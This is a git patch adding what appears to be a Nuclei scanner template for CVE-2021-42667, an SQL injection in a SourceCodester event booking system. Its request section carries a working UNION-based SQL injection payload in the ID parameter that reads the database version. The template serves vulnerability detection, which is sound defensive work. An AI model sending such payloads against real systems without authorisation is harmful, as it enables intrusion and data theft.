From 3a7aa65ab22c0a0fb02bc8f40f0e57e8c038c220 Mon Sep 17 00:00:00 2001 From: fxploit <63603934+fxploit@users.noreply.github.com> Date: Sat, 3 Sep 2022 15:26:47 +0900 Subject: [PATCH] Create CVE-2021-42667.yaml A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. --- cves/2021/CVE-2021-42667.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-42667.yaml diff --git a/cves/2021/CVE-2021-42667.yaml b/cves/2021/CVE-2021-42667.yaml new file mode 100644 index 0000000000..fe594f8095 --- /dev/null +++ b/cves/2021/CVE-2021-42667.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-42667 + +info: + name: SourceCodester Online Event Booking and Reservation System version 2.3.0 - SQL injection + author: fxploit + severity: critical + description: | + A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42667 + - https://github.com/0xDeku/CVE-2021-42667 + - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42667 + cwe-id: CWE-89 + tags: sourcecodester,injection,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/event-management/views/?v=USER&ID=1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "MariaDB" + - "MySQL" + + - type: status + status: + - 200